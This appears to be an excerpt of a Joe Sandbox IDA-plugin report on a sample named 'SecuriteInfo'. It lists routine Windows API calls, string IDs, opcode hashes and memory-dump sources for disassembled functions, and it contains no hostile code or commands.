                                                    • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                    • String ID: open
                                                    • API String ID: 2321548817-2758837156
                                                    • Opcode ID: c9d65f0364ef197a19eaff597e45eeadefe2f1c0192a56fa941e74e8eb135658
                                                    • Instruction ID: 0211963b45c90e3768c9ef21644230978b24cbb3f5e8dc308373cfe2f3b55888
                                                    • Opcode Fuzzy Hash: c9d65f0364ef197a19eaff597e45eeadefe2f1c0192a56fa941e74e8eb135658
                                                    • Instruction Fuzzy Hash: 7E617C75D006498FDB10CFA9C8487AEBBF5FF49324F14425AE824AB391EB789904DF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,0063E7D8), ref: 00368B63
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368BC8
                                                    • LoadCursorW.USER32(00350000,?), ref: 00368C24
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368CBB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$CursorEnterLoad
                                                    • String ID: ATL:%p
                                                    • API String ID: 2080323225-4171052921
                                                    • Opcode ID: e06a16b795282f8749a8600e67f5302b8db7c77248b60e1a23a4de25db97a57a
                                                    • Instruction ID: 0eefd9e035344440ab1fec87149e622a0d60c385172a73a08fbcde6fb280b063
                                                    • Opcode Fuzzy Hash: e06a16b795282f8749a8600e67f5302b8db7c77248b60e1a23a4de25db97a57a
                                                    • Instruction Fuzzy Hash: 8F51AC71D04B499BDB21CF69C9446AAFBF4FF18714F00861DE895A7690EB70B984CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,D13B3340,00000000,?,?,?,00000000,005483F0,000000FF), ref: 00458373
                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0045839C
                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,005483F0,000000FF), ref: 004583FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                    • API String ID: 4190037839-2994018265
                                                    • Opcode ID: 5b53a44253c54e0f3e1c5ad598a2622f4926073b5a56d6e90755fd2399f0b6cb
                                                    • Instruction ID: e2374bd36e8f2601ebb82739d088e886359908c2061c35e9381f567b55613a70
                                                    • Opcode Fuzzy Hash: 5b53a44253c54e0f3e1c5ad598a2622f4926073b5a56d6e90755fd2399f0b6cb
                                                    • Instruction Fuzzy Hash: 4131A272604205EFEB248F44DC45FABBBA8FB48B51F10812AFD05E7281EF75A814CA94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 0047569E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004756A5
                                                    • __Init_thread_footer.LIBCMT ref: 004756BC
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                    • String ID: Dbghelp.dll$SymFromAddr
                                                    • API String ID: 3268644551-642441706
                                                    • Opcode ID: 9bd3114ad74221ca1029a23513533f4b63b0fc81078e74da78a2d3317bf294bf
                                                    • Instruction ID: 27fac6a03bc3908c6a77f3517cabb5c21ccceb01f14e5bb88912699d25941df4
                                                    • Opcode Fuzzy Hash: 9bd3114ad74221ca1029a23513533f4b63b0fc81078e74da78a2d3317bf294bf
                                                    • Instruction Fuzzy Hash: CD01BCB1A84745EFC710CF98EC46B15B7B6F719721F104629E929873E0DB76A800CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,00520397,00000064), ref: 0052041D
                                                    • LeaveCriticalSection.KERNEL32(00637DCC,?,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 00520427
                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 00520438
                                                    • EnterCriticalSection.KERNEL32(00637DCC,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 0052043F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID: `{5
                                                    • API String ID: 3269011525-770602540
                                                    • Opcode ID: cdf7dd672b1c7a2b7370f79e5a85c5f00350bebc9afbc1e9132c53b0f9e05a51
                                                    • Instruction ID: ef5e9e977142869495539256aa2ccd901dbb8fee7dd74011483325ae4260cd66
                                                    • Opcode Fuzzy Hash: cdf7dd672b1c7a2b7370f79e5a85c5f00350bebc9afbc1e9132c53b0f9e05a51
                                                    • Instruction Fuzzy Hash: 82E09231A45535ABCB212F40EC08ABE3F2AFF06B12B014020F60D521B1CBA11814ABD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063946C,D13B3340,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5), ref: 0036B4FA
                                                    • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5), ref: 0036B57A
                                                    • EnterCriticalSection.KERNEL32(00639488,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5,000000FF), ref: 0036B733
                                                    • LeaveCriticalSection.KERNEL32(00639488,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5,000000FF), ref: 0036B754
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                    • String ID:
                                                    • API String ID: 1807155316-0
                                                    • Opcode ID: c2a9611d7cf35d997dce56fc180ceae41abb296cb23844b024f8c9d18b19c299
                                                    • Instruction ID: a97799979768d985ef0abf97a5e8c8d48bd951c4d256583b23fa838cb82b7562
                                                    • Opcode Fuzzy Hash: c2a9611d7cf35d997dce56fc180ceae41abb296cb23844b024f8c9d18b19c299
                                                    • Instruction Fuzzy Hash: 99B17074A00249DFDB11CFA4D888BAEFBB5BF49314F158059E805EB291DB75AD84CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,?), ref: 0046C4F4
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046C501
                                                    • GetFileAttributesW.KERNEL32(?,?,?,005C8798,00000001,D13B3340,?,0000000A,00000000,00000000,00587E15,000000FF), ref: 0046C510
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046C51D
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0046C55B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$FindNext
                                                    • String ID:
                                                    • API String ID: 3019667586-0
                                                    • Opcode ID: 77241f7b68638123a7e301a3e936ddfbb1c1c23cda72f9be02ec561e9d80f0f8
                                                    • Instruction ID: a2e382311421d4885b6ce406217c4a0b4688a6f6b7516df9722d886fef2bd6ca
                                                    • Opcode Fuzzy Hash: 77241f7b68638123a7e301a3e936ddfbb1c1c23cda72f9be02ec561e9d80f0f8
                                                    • Instruction Fuzzy Hash: E051B231500659ABDB24EF68CC94BFE77B4FF00310F14821AE8569B2E1EB38AD04CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 799199299-0
                                                    • Opcode ID: cef2ca02775773ab7bcea07c455d6e5d0fda5ca82dab98a62bab9d9ae3bb43e8
                                                    • Instruction ID: 1fb2e8b6208414b34bbbb6d8e1554d3456b1b9c18388327316d1804d62b4a1cc
                                                    • Opcode Fuzzy Hash: cef2ca02775773ab7bcea07c455d6e5d0fda5ca82dab98a62bab9d9ae3bb43e8
                                                    • Instruction Fuzzy Hash: DC41F232301201DFCB26CF55D8A9A76BBB9FB88391F04CD6AE546C7565C732E811DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00466B84
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00466BA6
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00466BCE
                                                    • std::_Facet_Register.LIBCPMT ref: 00466CB7
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00466CE1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                    • String ID:
                                                    • API String ID: 459529453-0
                                                    • Opcode ID: 4b8fbe6bfeb29cd3540569d6f6abf353eaaf54d09e58f3fb39b91a551f5f81e1
                                                    • Instruction ID: ba090ebd6e446e593034ee735e7c6cb10681900dc9ca086da793b7836ac86e3f
                                                    • Opcode Fuzzy Hash: 4b8fbe6bfeb29cd3540569d6f6abf353eaaf54d09e58f3fb39b91a551f5f81e1
                                                    • Instruction Fuzzy Hash: E151B0B0900655DFDB11CF58C984BAEBBB4FB00714F24815ED846AB381E779AE45CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0036028A
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00360290
                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 003602B3
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00549B16,000000FF), ref: 003602DB
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00549B16,000000FF), ref: 003602E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$FormatMessage
                                                    • String ID:
                                                    • API String ID: 1606019998-0
                                                    • Opcode ID: d8698f8415e48ef706b2050b74f9e890f138e3565e7293b3104399bf007c84f3
                                                    • Instruction ID: 3a09b277270c2a6a4af75fba8e87cb082c9801ca2c57bf3043b6a2eb00930068
                                                    • Opcode Fuzzy Hash: d8698f8415e48ef706b2050b74f9e890f138e3565e7293b3104399bf007c84f3
                                                    • Instruction Fuzzy Hash: 941163B0A44219ABEB10DF94DC0AFEFBBBCFB04B14F104515F510A72C1D7B66A048790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003779FB
                                                    • SendMessageW.USER32(?,?,?,0000102B), ref: 00377A58
                                                    • SendMessageW.USER32(?,?,?,0000102B), ref: 00377AA7
                                                    • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00377AB8
                                                    • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00377AC5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 86d367e1ca05d1e1a2831bcbf444986944f6ecb5fdb3983e2f1293756770dd92
                                                    • Instruction ID: 1c6c15f5c7e8d1310da0c635bc9c8f017a1514a42aa6b6057f52ca42e14a7c95
                                                    • Opcode Fuzzy Hash: 86d367e1ca05d1e1a2831bcbf444986944f6ecb5fdb3983e2f1293756770dd92
                                                    • Instruction Fuzzy Hash: F5215171918346AAE320DF11CD45B1ABBF1BFED758F206B0EF1D4211A4E7F192848E86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00383BAC
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00383BC1
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00383BC9
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateCreateHeapWindow
                                                    • String ID: RichEdit20W
                                                    • API String ID: 2359350451-4173859555
                                                    • Opcode ID: 72d1a8d7bb12ae50316d93630cd7fa7fd440293f3233a2d8174b4c0de657dd41
                                                    • Instruction ID: 6177d5271dfb65afb95ced5af23e07e68a21dbac06e229ce266942ec57a09808
                                                    • Opcode Fuzzy Hash: 72d1a8d7bb12ae50316d93630cd7fa7fd440293f3233a2d8174b4c0de657dd41
                                                    • Instruction Fuzzy Hash: 2FB18C71A002099FDB15DFA8C884BEEBBB5FF48710F14416DE945AB391DB75AD00CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00363B26
                                                    • SendMessageW.USER32(?,00000000,00000000), ref: 00363C22
                                                      • Part of subcall function 00365580: SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateFreeMessageSendStringWindow
                                                    • String ID: AtlAxWin140$Kc
                                                    • API String ID: 4045344427-1714451657
                                                    • Opcode ID: 5676b37a49e24416baeb4dc9851b29450781aaf7e4ed6b2c1f8b50063d3b92b1
                                                    • Instruction ID: 5e0b3ceaf154e0450ae6ddb30edcabdc5412eed4b26f35418db969156e3b2c03
                                                    • Opcode Fuzzy Hash: 5676b37a49e24416baeb4dc9851b29450781aaf7e4ed6b2c1f8b50063d3b92b1
                                                    • Instruction Fuzzy Hash: 19913774600205EFDB14DF68C888F9ABBB9FF49724F148598F8199B395DB71EA01CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0045E190: GetModuleFileNameW.KERNEL32(00000000,?,00000400,D13B3340), ref: 0045E1ED
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,Xw,80000001,00000001,00000000,?,D13B3340), ref: 00364392
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00364423
                                                    • RegCloseKey.ADVAPI32(00000000,D13B3340,?,?,00000000,0054ADC3,000000FF), ref: 00364502
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$FileModuleNameQueryValue
                                                    • String ID: Xw
                                                    • API String ID: 3856985302-1285161449
                                                    • Opcode ID: d6c5e9ad8db28662afe0bdd28089206e77d1f07c5aa4d62f71f6c04389369ea2
                                                    • Instruction ID: 7b0a302138506fd75bae0729c40248d73f2aa55487e8a0561b7c9f79cd8c9567
                                                    • Opcode Fuzzy Hash: d6c5e9ad8db28662afe0bdd28089206e77d1f07c5aa4d62f71f6c04389369ea2
                                                    • Instruction Fuzzy Hash: 80518A70E00248DBDB25DFA4CC59BEEBBB9FB04714F20865DE515AB280DF746A48CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • CloseHandle.KERNEL32(?,D13B3340,000000C9,00000000), ref: 0049F6A3
                                                    • DeleteCriticalSection.KERNEL32(?,D13B3340,000000C9,00000000), ref: 0049F731
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                    • String ID: << Advanced Installer (x86) Log >>$<3[
                                                    • API String ID: 3699736680-476628342
                                                    • Opcode ID: e13f225ac9d1ae8ce0b9dcc144dd7d8e335f5449029f1d880a353ca9c1e21130
                                                    • Instruction ID: cad519df82b0782395664e14dad90ca34f96a80d006c8141e2528a22a4490986
                                                    • Opcode Fuzzy Hash: e13f225ac9d1ae8ce0b9dcc144dd7d8e335f5449029f1d880a353ca9c1e21130
                                                    • Instruction Fuzzy Hash: 6161A070905646DFDB01CF68C948B5ABBF5FB45318F1482A9E8019B392DBB49909CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,D13B3340), ref: 004B0714
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
